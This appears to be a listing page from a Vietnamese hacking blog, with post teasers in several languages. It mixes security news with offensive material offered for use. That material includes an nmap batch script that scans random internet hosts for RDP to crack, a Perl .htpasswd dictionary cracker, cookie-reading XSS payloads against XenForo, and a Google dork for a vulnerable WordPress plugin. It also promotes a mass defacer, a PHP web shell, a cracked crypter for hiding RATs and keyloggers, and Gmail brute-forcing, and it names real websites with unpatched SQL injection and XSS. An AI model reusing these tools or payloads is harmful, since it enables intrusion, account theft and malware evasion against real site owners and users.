Google treo giải 3,1 triệu USD cho hacker

Nếu hack thành công vào hệ điều hành Chrome OS của Google, hacker không những không gặp phải rắc rối về pháp lý mà thậm chí còn có cơ hội nhận được giải thưởng lên đến hơn 3 triệu USD do chính Google trao tặng.

READ MORE »

Kỹ thuật tấn công Pass the Hash và cách phòng chống

Phân tích kỹ thuật tấn công Pass the Hash
Cách thức hoạt động của kỹ thuật tấn công Pass the Hash và minh họa các quá trình sử dụng thành công giá trị hash của mật khẩu lấy được mà không cần phải crack để có các nội dung đã được che giấu của nó.

READ MORE »

Exploiting Java Applet AverageRangeStatisticImpl Remote Code Execution

Hoy 23 de Enero, Oracle nuevamente es blanco de los "Hackers", pues se ha publicado una nueva vulnerabilidad que afectan a las versiones de Java 7u7-10 y anteriores, permitiendo a un atacante ejecutar código remoto en el sistema de la victima (Windows - Linux - MAC), para ello el equipo de Metasploit ha desarrollado un modulo denominado java_jre17_glassfish_averagerangestatisticimpl que facilita el trabajo a un atacante en el proceso de explotacion de esta nueva vulnerabilidad.

READ MORE »

Kết nối Wifi không cần biết mật khẩu

Bài viết sau đây sẽ hướng dẫn cách connect vào wifi mà không cần password đơn giản mà hiệu quả. Các bạn sẽ không phải đau đầu đi tìm các phần mềm hack/crack pass wifi nữa mà thông qua pass của máy tính đã connect wifi trước đó.
READ MORE »

Lỗ hổng bảo mật - những hiểu biết căn bản

Ngày nay, kiếm được một phần mềm anti virus hoạt động hiệu quả và không tốn quá nhiều tài nguyên máy không còn quá khó như một vài năm trước.

Điểm danh những phần mềm miễn phí, ta có AVG, Avast, Avira, thậm chí việc kiếm key bản quyền xịn của những Kaspersky, Bitdefender cũng không còn quá khó và đắt đỏ.

Nhưng khi nói đến bảo mật, có rất nhiều khía cạnh ta cần lưu tâm, trong đó tìm kiếm và cài đặt một phần mềm antivirus tốt mới chỉ là một mặt của vấn đề.

READ MORE »

How to check Thuexesaigon.net?

Free VPS VN (7 day)

Site: Click Here

Mail báo reg thành công:

 

Control Panel:

 

Nguồn: Juno_okyo's Blog

Bypass CloudFlare Video

Stealing Session's Via HTML Injection

Stealing Session's Via HTML Injection

Download Video: http://www.mediafire.com/?c45nf3t4f84b0zf

Password: junookyo 

Cross Site Scripting filtration Bypass

/*Cross Site Scripting filtration Bypass */

This Tutorial Was Not Originally written by Me

_1
__________________________________________
Introduction To Xss(Cross site scripting):

'Cross-Site Scripting' also known as 'XSS' in short is a kind of vulnerability that exist in era of both web applications
as well as os based applications, but in most cases in web applications.You might be wondering why it's known as 'xss' not
'css' reffering to the full form.Well, basically css is already a reserved abbreviation of 'Cascade Style Sheets'.It allows
malicious code to be executed on a vulnerable server most probably session hijacking to gain administrator privileges.
Xss totally depends on cookies and session and though 'cookies' are known as the backbone of Cross-Site Scripting
Vulnerability.

READ MORE »

Simple XSS Vulnerability Patch

Simple XSS Vulnerability Patch

Download video: http://www.mediafire.com/?6s49anyo3l3pofo

Password Unlock: junookyo

Danger Based XSS (Cross Site Scripting)

Tutorial about Dom base XSS.

Download here: http://www.mediafire.com/?w0i9gt4m5cu7gbo

Password: junookyo

Cross-Site Scripting for Fun and Profit

/==========================================================​\
---------------------------------[ PLAYHACK.net ]---------------------------------
\=========================================================​=/

-[ INFOS ]-----------------------------------------------------------------------
Title: "Cross-Site Scripting for Fun and Profit"
Author: Nexus
Website: http://nexus.playhack.net
Date: 2007-04-08 (ISO 8601)
---------------------------------------------------------------------------------

READ MORE »

RDP Cracking IP List Maker Script

I found these script on google so all credits goes to coder

Save this Script as name "blah.bat"

Code:

@echo off
for /l %%%x in (1,1,2) do (
start "rdp" /HIGH nmap -n -Pn -p T:3389 -T5 --script rdp.nse -iR 0
)
exit

READ MORE »

.htpasswd crack exploit

#! /usr/bin/perl
# crack.pl by fwaggle root@fwaggle.net
open (PASSFILE, "senhas");
my @passfile = <PASSFILE>;
close PASSFILE;
open (DICTFILE, "dictionary.txt");
my @dictfile = <DICTFILE>;
close DICTFILE;
foreach $line (@passfile) {
my ($username, $encpass) = split(/:/, $line);
foreach $attempt (@dictfile) {
if ($encpass eq crypt($attempt, $encpass)) {
print("Cracked: ${username}:${attempt}\n");
}
}
}

MadSpot Shell v2 (Released)

This is offical 2nd php shell by Madleets Team

this shell design specially for command line user . you can use Shell as terminal ..you type any command it will show result same as terminal ..
READ MORE »

Writing an XSS Worm

===========================
Writing an XSS worm
Version 0.3 (Updated 17/10/06)
By kuza55
===========================
READ MORE »

Wordpress Plugins Spotlight Upload Vulnerability

Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.comREAD MORE »

XSS vul in Xenforo CMS

Title: XSS vul in Xenforo CMS.

Author: Darksnipper

CMS Link: www.xenforo.com
vul type: XSS.

VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >

Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army

Or read here:
http://www.exploit4arab.com/exploits/321

Prv8 wordpress and joomla mass defacer

Download:
http://www.mediafire.com/?sftiwmr8szfseb2

Pass: junookyo

Nemesis Crypter Fully Cracked

Nemesis Crypter is a good tool to FUD your RAT or Keylogger. It was used to make FUD but now it is only UD (Undetectable) but anyways its a nice tool with many impressive options for your use. Just click on cancel when it asks you for serial key :) . Sometimes some antivirus detects it as virus but dont worry it is a valse positive. There is about 2/6 chances of antivirus to detect it. Its false positive.READ MORE »

Ultimate Graphics Resources ~ Collection of Links and Tutorials

STOCKS:
http://www.photorack.net/
http://imagebase.davidniblack.com/main.php
http://freelargephotos.com/
http://public-domain-photos.com/
http://www.dexhaus.com/v2/home.html?1657
http://www.freeimages.co.uk/
http://www.fromoldbooks.org/
http://www.pdphoto.org/
http://www.shutterstock.com/
http://openphoto.net/
http://www.bigfoto.com/
http://www.cepolina.com/freephoto/
http://sassy-stock.deviantart.com/
http://www.freephotosbank.com/
http://visipix.dynalias.com/index_hidden.htm
http://www.turbophoto.com/Free-Stock-Images/
http://www.freestockimages.net/
http://www.freerangestock.com/
http://www.dreamstime.com/
http://www.freefoto.com/index.jsp
http://www.adigitaldreamer.com/gallery/
http://www.creatingonline.com/stock_photos/
http://www.imageafter.com/
http://www.stockvault.net/
http://www.kavewall.com/
http://www.deviantart.com/
http://www.flickr.com/
http://www.morguefile.com/
http://everystockphoto.com/
http://www.sxc.hu/
http://lillyfly06-stock.deviantart.com/
http://katanaz-stock.deviantart.com/
READ MORE »

Hunting for XSS Vulnerabilities

Finding an xss’s vulnerable website is not very difficult.
In most cases can write in the search:

Code:
“><script>alert(‘try_xss’);</script>

This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.
READ MORE »

All Web Application Attacking Methods

This list is not full list, if there are some attacks I missed, please comment below.

READ MORE »

Joomla Administrator Login BruteForcer [Python]

It is a successful bruteforcer of Joomla Administration Panel, coded in Python.

READ MORE »

Hacking Websites via LFI (Simple, Short and easy)

 

 1. Introduction

 2. /proc/self/environ

 3. PHP injection

 4. Accessing the shell

READ MORE »

Infographic: Malware is Everywhere

Exploiting New Java 0-day with Metasploit

Se ha descubierto una nueva vulnerabilidad (0-day) en las versiones de Java 7 Update 10 y anteriores, que permite a un atacante ejecutar código arbitrario en cualquier sistema operativo que cuente con esta version de Java. Actualmente esta versión es la ultima actualización  por lo tanto el 90% de los usuarios de Internet lo tienen instalado y el 50% de estos no tienen conocimiento sobre el riesgo que pueden estan corriendo.

READ MORE »

SQL Injection to Shell with SQLMap

Hace algunos días auditando un Servidor Web (universidad) basada en Apache 1.3.26, PHP 4.2.1 a un cliente, me tope con la típica vulnerabilidad de Inyección de Código Sql, la cual permite fácilmente obtener toda la base de datos del servidor, entonces de inmediato empece a inyectar manualmente pero para mi suerte!!! ninguna de las inyecciones y bypasses dio resultado, entonces me pregunte ¿Por que? si es una vulnerabilidad peligrosa y fácilmente explotable, pero luego analizando nuevamente di con el resultado que era un simple FP (falso positivo).

READ MORE »

Exploiting Windows 7 with Internet Explorer CSS Recursive Import Exploit

Existe una vulnerabilidad en las versiones 8 y anteriores de Internet Explorer que permite a un atacante vulnerar cualquier Sistema Operativo que contengan estas versiones vulnerables. Recordar que en la actualidad existen muchos exploits remotos que pueden vulnerar este navegador, pero esta vulnerabilidad no es muy "conocida" por los usuarios ya que hasta la actualidad se puede seguir explotando.  

El respectivo modulo que se integra en Metasploit se aprovecha de una vulnerabilidad de corrupción de memoria en Microsoft\'s HTML motor (mshtml). Este exploit utiliza una combinación de aspersión y el módulo de almacenamiento dinámico 'mscorie.dll' la 2.0. NET para bypassear DEP y ASLR aprovechándose así para tomar el control total del sistema vulnerable.

A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.

READ MORE »

Metasploit: Java Signed Applet

[Warning] TenTen.vn - Cross Site Scripting

• Exploit: Cross Site Scripting (XSS)
• Description: Inject script via some inputs.
• Tình trạng: (Đang liên hệ QTV).

Cách gửi email mã hóa qua Gmail trên Chrome

Phần mở rộng (extension) miễn phí của Google Chrome cho phép gửi đi email được mã hóa từ Gmail tới các dịch vụ email khác. Bạn cần gửi đi một email chứa thông tin nhạy cảm? Mọi email gửi đi theo cách thông thường đều có nguy cơ bị chặn hoặc bị “hack” trước khi đến tay người nhận.

READ MORE »

Foxit Reader dính lỗ hổng bảo mật nghiêm trọng

Ứng dụng xem file PDF, Foxit Reader, vừa bị phát hiện dính lỗ hổng nghiêm trọng trong thành phần plug-in, có thể bị khai thác để thực thi các mã tùy chỉnh trên máy tính.

Thông tin chi tiết về lỗ hổng và cách khai thác lỗ hổng đã được hacker độc lập người Ý, Andrea Micalizzi công bố công khai vào tuần trước.

READ MORE »

Java dù được sửa lỗi vẫn chưa an toàn

Bộ An ninh nội địa Mỹ khuyên người dùng máy tính nên vô hiệu hoá Java trên trình duyệt web của mình bởi Oracle mới sửa một lỗi trên đó và vẫn còn nhiều lỗ hổng bảo mật khác chưa được vá.

READ MORE »

Oracle vá lỗi bảo mật nghiêm trọng cho Java

Hãng phần mềm vừa tung ra Java Version 7 Update 11 nhằm ngăn kẻ xấu lợi dụng lỗ hổng bảo mật để điều khiển máy tính từ xa.

Java vừa có phiên bản mới.

READ MORE »

Cách vô hiệu hóa Java đang gây lỗi nguy hiểm cho máy tính

Các chuyên gia bảo mật mới đây vừa lên tiếng cảnh báo người dùng nên tắt Java trên trình duyệt của họ để bảo vệ máy tính, bởi Java đang gặp lỗ hổng bảo mật rất lớn và hacker đang lợi dụng các lổ hổng này để tấn công người dùng. Đi tiên phong trong việc này là Apple và Mozilla. "Táo khuyết" đã vô hiệu hóa plugin Java 7 trên OS X; còn Mozilla đưa các add-on Java 7 Update 9, Java 7 Update 10, Java 6 Update 37, and Java 6 Update 38 vào "danh sách đen" không cho tải về. Bởi thế, người dùng cần vô hiệu hóa Java trên trình duyệt của mình để tránh các nguy cơ bị tấn công trong khi chờ đợi 1 phiên bản cập nhật Java có thể vá các lỗ hổng bảo mật.

READ MORE »

Cảnh báo virus lấy cắp thông tin tài khoản ngân hàng

Gần đây, virus Eurograbber đã được các tin tặc sử dụng để lấy cắp 36 triệu euro từ nhiều tài khoản ngân hàng tại các nước châu Âu.

Trong thời gian qua, trên thế giới đã xuất hiện nhiều vụ lừa đảo trên mạng Internet do các đối tượng lợi dụng sự bất cẩn của người sử dụng để cài đặt virus độc hại trên máy tính cá nhân và thiết bị di động, từ đó lấy cắp thông tin và tiền từ tài khoản ngân hàng.

READ MORE »

40 basic linux command-line tips and tricks

Thân chào các linux sysadmin, dưới đây là 40 mẹo/thủ thuật cơ bản mà không hẳn là dân quản trị nào cũng đã nắm qua.
Anh chị em nào có mẹo hay hay thì bổ sung cho có khí thế. Còn rất nhiều và không phải tất cả đều đúng trên mọi hệ thống nhé !

READ MORE »

pfSense 2.0.1 XSS / CSRF / Remote Command Execution Vulnerabilities

pfSense là 1 Open Source Filewall Distribution rất phổ dụng. thường dùng làm chốt chặn đầu ra internet rất hiệu quả trong doanh nghiệp cũng như các tổ chức (ưu điểm là Open Source và dễ dùng), thế nên các các lỗ hổng dưới đây nếu biết cách khai thác thì sẽ có khối việc để quan tâm đấy!
READ MORE »

Con đường trở thành lập trình viên PHP

Lương lập trình viên PHP lúc mới ra trường chỉ khoảng 3 đến 5 triệu đồng một tháng, nhưng đây là thời gian để bạn tập trung vào nâng cao kỹ năng lập trình, kỹ năng mềm, làm việc nhóm, trau dồi ngoại ngữ... Những vị trí cấp cao trong lĩnh vực này lương có thể tới 2.000 USD.
READ MORE »

[Warning] Dmart.vn - SQL Injection

• Exploit: SQL Injection
• Description: Query from TopX.
• Đánh giá: Nghiêm trọng.
• Tình trạng: (Đang liên hệ Quản trị viên).

Java Applet JMX Remote Code Execution

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

#   http://metasploit.com/

##
READ MORE »

Cẩn thận với các mánh hack wifi lan truyền trên mạng

Trong thời đại lên ngôi của các thiết bị di động thông minh như smartphone, tablet hay laptop, mạng wifi đã trở nên vô cùng thân thuộc đối với các hộ gia đình tại Việt Nam.

Hầu hết mọi người đều ý thức được tầm quan trọng của việc đặt mật khẩu cho mạng không dây để bảo vệ băng thông đường truyền cũng như ngăn chặn kẻ xấu đột nhập vào máy tính nhằm ăn cắp dữ liệu mật. Do đó gần như tất cả những ai sử dụng modem, router wifi đều đã thiết lập password trong lần đầu tiên lắp đặt và vận hành thiết bị.

READ MORE »

[Warning] RapperVN.net - Cross Site Scripting

• Exploit: Cross Site Scripting
• Description: Inject via member's blog.

Skydreamer HTML5 responsive vCard

home : http://themeforest.net/item/skydream...-vcard/2950493
demo : http://simplesphere.net/html5/
Skydreamer HTML5 responsive vCard is a simple, minimalistic, clean and easy to set up CSS3 Vcard template. It can be adpated for both personal or commercial (business) use. A great way to showcase your portfolio, Skydreamer HTML5 vCard comes with a unique design, that adapts to different screen sizes with adequate comments all over the theme files and a solid documentation. The template has a unique and impressive look that will satisfy every taste.
Please rate my design so that I can further improve my upcoming themes
READ MORE »

[Photoshop] Bộ sưu tập các kiểu tóc

Bộ sưu tập gồm rất nhiều kiểu tóc nam và nữ dành cho photoshop, rất đẹp.Với bộ sưu tập này bạn có thể thảo sức sáng tạo của mình để tạo ra những bức ảnh cùng với kiểu tóc mà mình hằng mong đợi.

Link download:

http://www.mediafire.com/?h5kxfpnri0j5m8o

Another Stored XSS in Facebook.com

Another Stored XSS in Facebook.com, Another 3500$ Bounty

Hi,

I want to share my Stored XSS finding in facebook.com,

READ MORE »

Gửi tệp tin .exe ngay trong Gmail

Gmail  và Yahoo Mail hay bất cứ dịch vụ mail nào khác đều không hỗ trợ đính kèm các tệp tin có định dạng .exe (file chạy) và một số định dạng khác. Tuy nhiên, có rất nhiều cách để bạn gửi file chạy qua email, trong đó phổ biến nhất là nén file đó thành định dạng RAR, ZIP hay 7Z rồi mới tiến hành đính kèm. Một thủ thuật khá đơn giản có thể giúp bạn thực hiện điều này ngay trong Gmail bằng cách sử dụng dịch vụ lưu trữ trực tuyến Google Drive.

READ MORE »

[Tutorial] Race condition attack trên ứng dụng web

Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
READ MORE »

Yahoo! chặn lỗi nguy hiểm trong mail

TTO - Khi nhấn vào liên kết được gửi trong email Yahoo! Mail, kể cả từ địa chỉ người quen, hacker sẽ có thể khai thác lỗi và gửi hàng loạt email tương tự đến tất cả địa chỉ trong danh bạ.

Ảnh minh họa: Internet

READ MORE »

[TUT] Brute force password Gmail with Hydra

Hydra:

http://junookyo.blogspot.com/2012/12/fast-network-cracker-hydra-v-74-updated.html

Tutorial:

http://www.mediafire.com/?unqz15ff5cvyomr

Pass: junookyo

Cracking wifi wpa-psk Networks (Learn How to Protect your Privacy)

HD 720p: http://www.youtube.com/watch?v=nps0zPB78fk (open in new tab).

How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com)

Hi,

I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.

Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion),  You may unintentionally expose your organization to these kind of risks

READ MORE »

[TUT] - Khai thác lỗi Microsoft IIS tilde character ~

Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"

READ MORE »

How to crack cPanels

Hello guys this is AV.. Today i'll show you the two ways to crack cpanel

What we will need for this?

1. shelled website

2. the shelled website should be symlink enableled.

Lets start XD
READ MORE »

Online SQLi Scanner

Online SQLi scanner is the best thing you need when you are out of your private hacking room. So here is one more Online SQLi scanner i found today so sharing with you people. 

Its right here - http://www.poomplacedorm.com/hyde.php

Online Hash Crackers (Collection)

Online Hash Crackers 



READ MORE »

Metasploit Framework Guide for PenTesters

More Info

http://pentestmag.com/metasploit-framework-guide-for-pentesters/

Price

36,90 USD

Download

http://www.sendspace.com/file/c3scpi

[Slide] Security BootCamp 2012

Tổng hợp Slide về an toàn thông tin. Link download:

http://www.mediafire.com/?zpnfx6oxiw6rpmc

[Video TUT] Hướng dẫn tự tạo skin Yahoo

Đã có 1 bài hướng dẫn tại đây:

http://junookyo.blogspot.com/2012/12/huong-dan-tu-tao-skin-cho-yahoo.html

Mình làm video hướng dẫn 1 cách chi tiết và rõ ràng cho những bạn nào chưa làm được:

Xem HD tại tab mới nhé:

http://www.youtube.com/watch?v=zMRWxftDy8o

[Warning] Dalathoiquan.net

• Exploit: SQL Injection
• Đánh giá: Nghiêm trọng.
• Khai thác: Query lấy thông tin User.
• Tình trạng: (Đã liên hệ Quản trị viên).

[Warning] ChauLinh.com - Cross Site Scripting

• Exploit: Cross Site Scripting (XSS)
• Description: Inject script từ form search.
• Tình trạng: Đang liên hệ quản trị viên.

[Warning] HangChinhHieu.vn - Cross Site Scripting

• Exploit: Cross Site Scripting (XSS)
• Description: Inject script từ form search (Bypass filter thành công).
• Tình trạng: Đã liên hệ Quản trị viên.

[Warning] ChoiGame24g.com - Cross Site Scripting

• Exploit: Cross Site Scripting (XSS)
• Description: Inject script từ form search.
• Tình trạng: Đang liên hệ Quản trị viên.

[Warning] HoaPhat.vn - Cross Site Scripting

• Exploit: Cross Site Scripting (XSS)
• Demo: http://tinyurl.com/agspglv (Short URL).
• Description: Inject script từ form search.
• Tình trạng: Đang liên hệ quản trị viên.  

GenXE: Generate Xss Exploit

Description

GenXE: Generate XSS Exploit (tool). Give us a simple cross-site scripting exploit: alert, GenXE generates complex exploit(s) for you.

GenXE Web Site

Download source:

http://sourceforge.net/projects/genxe/files/latest/download

Các lỗi HTTP khi truy cập web và cách sửa

Giao thức HTTP viết tắt của cụm từ Hyper Text Transfer Protocol (giao thức truyền siêu văn bản) và nó đã trở thành giao thức mặc định khi bạn sử dụng các trình duyệt để lướt web. Đôi khi bạn gặp các lỗi thông báo khi dùng giao thức HTTP, thường được gọi là HTTP error codes (tạm dịch: mã lỗi HTTP). Mời các bạn theo dõi bài viết để có các nhìn về các mã lỗi này và hướng dẫn cách giải quyết.

READ MORE »